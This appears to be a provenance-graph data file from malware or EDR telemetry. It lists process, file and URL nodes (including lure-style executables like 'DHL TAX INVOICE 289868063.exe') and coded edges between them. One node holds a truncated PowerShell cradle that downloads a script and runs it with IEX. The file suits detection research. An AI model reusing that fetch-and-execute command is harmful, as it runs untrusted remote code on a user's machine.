15
MP*-DHL TAX INVOICE 289868063.exe 
MF-\Users\admin\AppData\Local\Temp\Heapman45.exe
MP-renamer-7.5.exe
MP-jerkoff.exe 
MF-.\T1218.001\src\T1218.001.c
SO-https://meta.ua/';$nwc.headers['Sec-Fetch-Dest']='document';$nwc.headers['Sec-Fetch-Mode']='no-cors';$nwc.headers['Sec-Fetch-Site']='cross-site';$nwc.headers['TE']='trailers';$nwc.headers['User-Agent']='Mozilla/5.0
SO-https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt','Default_File_Path.ps1');IEX((-Join([IO.File]::ReadAllBytes('Default_File_Path.ps1')|ForEach-Object{[Char]$_
MF-CSIDL_COMMON_VIDEO\videotv.m3u
MP*-nltest.exe
TP*-c9923098.exe
MP-setup.exe 
MF-c:\Users\admin\AppData\Local\Temp\CSCF2B3
MF-\Users\admin\AppData\Local\Temp\207aa4515d\oneetx.exe
SO-https://clients2.google.com/cr/report
TP*-VRAPP.exe 
38
0 1 EX
0 2 FR
2 1 WR
0 3 FR
3 1 WR
2 3 UK
0 4 WR
5 0 RF
0 6 ST
0 7 RD
0 8 FR
8 1 CD
8 4 CD
8 5 ST
6 8 RF
8 7 RD
0 9 FR
9 1 RD
9 4 WR
9 5 ST
9 6 ST
9 7 WR
8 9 IJ
0 10 FR
10 1 EX
10 4 WR
10 5 ST
6 10 RF
10 7 EX
8 10 UK
9 11 RD
9 12 RD
9 13 ST
14 4 RD
5 14 RF
14 6 ST
14 7 WR
9 14 UK

